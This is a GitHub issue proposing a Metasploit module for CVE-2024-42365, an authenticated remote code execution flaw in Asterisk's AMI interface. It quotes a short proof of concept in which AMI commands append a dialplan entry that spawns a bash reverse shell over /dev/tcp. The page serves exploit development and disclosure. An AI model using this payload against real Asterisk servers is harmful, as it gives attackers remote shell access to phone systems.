Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Asterisk RCE over AMI (CVE-2024-42365) #19388

Open
h00die opened this issue Aug 14, 2024 · 0 comments · May be fixed by #19613
Open

Asterisk RCE over AMI (CVE-2024-42365) #19388

h00die opened this issue Aug 14, 2024 · 0 comments · May be fixed by #19613
Assignees
@h00die
Labels
suggestion-module New module suggestions

Comments

@h00die
Copy link
Contributor

h00die commented Aug 14, 2024

Summary

This RCE looks pretty simple, is cleartext, and gets RCE with low permissions.

Basic example

GHSA-c4cg-9275-6w44

Action: Login
Username: testuser
Secret: testuser

Action: Originate
Channel: Local/700@parkedcalls
Application: SET
Data: FILE(/etc/asterisk/extensions.conf,,,al)=exten => 111,1,System(/bin/bash -c 'sh -i >& /dev/tcp/127.0.0.1/4444 0>&1')

Motivation

Asterisk is used as the underlying framework for phone stuff in MANY systems
@h00die h00die added the suggestion-module New module suggestions label Aug 14, 2024
@h00die h00die self-assigned this Oct 30, 2024
@h00die h00die linked a pull request Nov 1, 2024 that will close this issue
Open
8 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@h00die h00die

Labels
suggestion-module New module suggestions
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Asterisk authenticated rce via AMI (CVE-2024-42365) h00die/metasploit-framework
1 participant
@h00die